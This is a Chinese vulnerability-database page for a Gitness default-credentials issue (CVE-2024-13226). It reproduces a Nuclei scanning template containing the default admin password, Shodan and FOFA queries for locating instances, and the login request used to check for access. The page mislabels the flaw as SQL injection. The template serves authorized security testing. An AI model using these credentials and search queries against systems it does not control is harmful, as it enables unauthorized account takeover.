momo安全漏洞库

多模块数据检索平台

登录 注册
返回列表

gitness-default-login: Gitness - Default Login

CVE: CVE-2024-13226
CNVD: 暂无
CNNVD: 暂无
漏洞类型: SQL注入
漏洞等级: 高危
年份: 2026
POC_ID: 暂无
漏洞描述
Detected Gitness instance was found using default admin credentials (admin/changeit). [已公开] id: gitness-default-login info: name: Gitness - Default Login author: 0x_Akoko severity: high description: | Detected Gitness instance was found using default admin credentials (admin/changeit). reference: - https://docs.gitness.com/ metadata: max-request: 2 verified: true shodan-query: title:"Gitness" fofa-query: title="Gitness" tags: gitness,default-login variables: username: "admin" password: "changeit" http: - raw: - | POST /api/v1/login?include_cookie=true HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"login_identifier":"{{username}}","password":"{{password}}"} matchers: - type: dsl dsl: - 'contains_all(body, "access_token", "principal_id", "session")' - 'contains(content_type, "application/json")' - 'status_code == 200' condition: and # digest: 4a0a0047304502200c8d3d39d5528cb8f287ae4b79a4d0d38a32e72954c66f45988e198ab1e8c856022100afa159d2ff1099be18a0ee196d6c0f392986f5d24573b764a8bb2a803626516a:922c64590222798bb761d5b6d8e72950 来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/gitness-default-login.yaml
影响范围
未知
漏洞详情
登录后可查看漏洞详情。请先 登录注册
漏洞 POC
登录后可查看漏洞 POC。请先 登录注册
修复建议
暂无